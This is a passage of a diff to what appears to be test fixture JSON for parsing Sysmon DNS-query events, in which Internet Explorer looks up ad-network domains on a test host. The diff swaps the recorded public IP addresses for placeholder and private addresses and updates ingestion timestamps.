Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3334,39 +3298,39 @@ "type": "CNAME" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3374,22 +3338,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.180.12", - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -3406,23 +3370,16 @@ "ib.adnxs.com" ], "ip": [ - "68.67.180.12", - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313779569Z", + "ingested": "2021-12-09T13:49:44.739231800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3486,12 +3443,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { @@ -3507,13 +3464,13 @@ "cm.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313780706Z", + "ingested": "2021-12-09T13:49:44.739237400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3577,35 +3534,35 @@ "type": "CNAME" }, { - "data": "54.208.129.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.175.5.93", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.210.96", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.93.252.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.86.97.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.239.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.67.102", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3613,21 +3570,21 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.208.129.24", - "54.175.5.93", - "52.86.210.96", - "3.93.252.59", - "54.86.97.130", - "34.194.239.194", - "3.94.67.102", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -3643,22 +3600,16 @@ "match.adsrvr.org" ], "ip": [ - "54.208.129.24", - "54.175.5.93", - "52.86.210.96", - "3.93.252.59", - "54.86.97.130", - "34.194.239.194", - "3.94.67.102", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313781939Z", + "ingested": "2021-12-09T13:49:44.739243300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3726,12 +3677,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { @@ -3748,13 +3699,13 @@ "ssum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313783193Z", + "ingested": "2021-12-09T13:49:44.739249100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3818,39 +3769,39 @@ "type": "CNAME" }, { - "data": "18.204.130.216", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.246.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.153.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.235.141.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.79.248", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.146.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.64.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.161.226", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3859,15 +3810,15 @@ } ], "resolved_ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, @@ -3884,22 +3835,15 @@ "protected-by.clarium.io" ], "ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313784367Z", + "ingested": "2021-12-09T13:49:44.739254900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3963,12 +3907,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { @@ -3984,13 +3928,13 @@ "pagead2.googlesyndication.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313785772Z", + "ingested": "2021-12-09T13:49:44.739260700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029379000Z'/\u003e\u003cEventRecordID\u003e96\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.838\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epagead2.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 